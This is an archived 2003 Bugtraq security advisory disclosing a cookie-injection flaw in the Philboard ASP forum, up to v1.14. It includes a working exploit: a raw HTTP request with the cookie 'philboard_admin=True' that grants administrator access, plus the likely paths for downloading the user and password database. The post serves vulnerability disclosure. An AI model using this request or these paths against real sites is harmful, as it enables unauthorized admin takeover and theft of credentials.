| lists.openwall.net | lists / announce owl-users owl-dev john-users john-dev passwdqc-users yescrypt popa3d-users / oss-security kernel-hardening musl sabotage tlsify passwords / crypt-dev xvendor / Bugtraq Full-Disclosure linux-kernel linux-netdev linux-ext4 linux-hardening linux-cve-announce PHC | |
|
Open Source and information security mailing list archives
| ||
|
Date: Thu, 29 May 2003 15:48:45 +0700 From: aresu@...en.net To: bugtraq@...urityfocus.com Subject: Philboard Forum Vulnerability Philboard Vulnerability Severity : High (Possible gain administrator/users access on Forum Board) Systems Affected: Philboard up to v1.14 Vendor URL: http://www.youngpip.com/philboard.asp Vuln Type : Cookie Injection Status : Vendor contacted, fixed version is not available (cause they didn't response) Author : AresU Greetz to : Bosen, Tioeuy, syzwz, Heltz, eF73, SakitJiwa, gembule, muthafuka, and All 1ndonesian Security Team (1st) #romance@...trin.net.id http://www.bosen.net/releases/ Summary ======= Philboard is freeware forum application under ASP Scripts. Vulnerable script is on cookie management, all most script is vulnerable for cookie injection. The cookies are "philboard_admin=True;" or "admin=True;" Acknowledgments =============== Vulnerability discovery and advisory by AresU Vendor Response =============== Vendor has contacted and fixed version is not available (cause they didn't reponse) To Fix the script, you must change every cookie command in to session command. Exploit Code ============ 1) Login Administrator Forum: Use your telnet and open target on port 80 GET /board/philboard_admin.asp HTTP/1.0 Host: target.com Cookie: philboard_admin=True; 2) Download the database (users and password): Usually, the database location can be found and download it from: http://www.target.com/database/philboard.mdb or http://www.target.com/forum/database/philboard.mdb ----------------------------------------------- This mail sent through http://webmail.bosen.net
Powered by blists - more mailing lists